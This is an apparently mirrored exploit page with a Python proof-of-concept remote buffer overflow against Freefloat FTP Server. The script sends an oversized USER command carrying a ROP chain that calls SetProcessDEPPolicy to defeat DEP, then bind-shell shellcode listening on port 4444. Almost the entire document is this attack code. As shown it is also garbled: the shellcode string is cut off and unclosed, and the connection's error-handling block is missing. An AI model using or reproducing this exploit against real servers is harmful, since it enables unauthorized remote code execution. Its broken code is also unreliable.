Freefloat FTP Server – Remote Buffer Overflow (DEP Bypass)

  • 作者: blake
    日期: 2011-09-23
  • 类别:
  • 来源:
  • #!/usr/bin/python
    import socket, sys
    from struct import pack
    print "\n==============================="
    print "Freefloat FTP Server DEP Bypass"
    print " Written by Blake"
    print "===============================\n"
    if len(sys.argv) != 3:
    	print "[*] Usage: %s <target> <port>\n" % sys.argv[0]
    target = sys.argv[1]
    port = int(sys.argv[2])
    # 728 bytes for shellcode
    #Bind Shell shellcode port 4444
    shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
    buffer = "\x41" * 230
    eip = pack('<L',0x77f613ac)		# RETN - shlwapi
    rop = "\x42" * 8			# compensate
    rop += pack('<L',0x77c2362c)		# POP EBX, RETN - msvcirt
    rop += "\xff\xff\xff\xff"
    rop += pack('<L',0x77c127e1)		# INC EBX, RETN
    rop += pack('<L',0x5d093466)		# POP EBP, RETN
    rop += pack('<L',0x7c8622a4)		# SetProcessDEPPolicy 
    rop += pack('<L',0x5d095470)		# POP EDI, RETN
    rop += pack('<L',0x5d095471)		# RETN
    rop += pack('<L',0x5d0913b4)		# POP ESI, RETN
    rop += pack('<L',0x5d095471)# RETN
    rop += pack('<L',0x77e7d102) 		# PUSHAD # RETN - RPCRT4
    nops = "\x90" * 10
    junk = "\x42" * (1000 - len(buffer + eip + rop + nops + shellcode))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "[+] Connecting to %s on port %d" % (target,port)
    	print "[+] Sending payload"
    	s.send("USER " + buffer + eip + rop + nops + shellcode + junk + "\r\n")
    	print "[+] Exploit successfully sent"
    	print "[X] Unable to connect to %s" % target
    raw_input("[+] Press any key to exit\n")